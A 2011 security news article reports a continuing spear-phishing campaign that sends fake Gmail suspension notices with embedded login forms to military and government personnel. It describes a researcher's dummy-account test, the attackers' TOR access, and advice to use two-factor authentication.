Aug 16, 2011 15:01 GMT  ·  By

Security researchers warn that spear phishing attacks targeting the personal Gmail accounts of people working for the military, government agencies or contractors, continue.

"Once compromises happen and are covered in the news, they do not disappear and attackers don't give up or stop. They continue their business as usual," writes independent security researcher Mila Parkour.

Parkour, who played an important role in investigating the original wave of attacks in June, analyzed a new campaign that generates emails posing as account suspension notifications.

The subject of the emails is "CNAS Report Calls Declining Satellite Capabilities National Security Concern," the title of a real press release from the Center for a New American Security (CNAS).

The email claims the recipient's account was suspended for unusual activity that may involve handling a large quantity of email over POP or IMAP, sending a large number of undeliverable messages, using browser extensions that automate authentication, leaving multiple instances of Gmail open and others.

The email contains a login form and instructs users to authenticate in order to re-activate their account. The recipient's address is already filled into the form.

Parkour created a dummy account, filled it in with email messages that attackers would be interested in, including some in Chinese, and submitted the login details for it via the form.

The stolen passwords were sent to a location on a legit but compromised website. In less than two hours the attackers accessed the account from a TOR exit node in the Netherlands, showing that they go to great lengths to cover their tracks.

"Google are aware of this, there is not much they can do to prevent these from coming in but I am sure they are trying. If you are concerned about your account safety, please use two-factor authentication and change your passwords often," Parkour advises.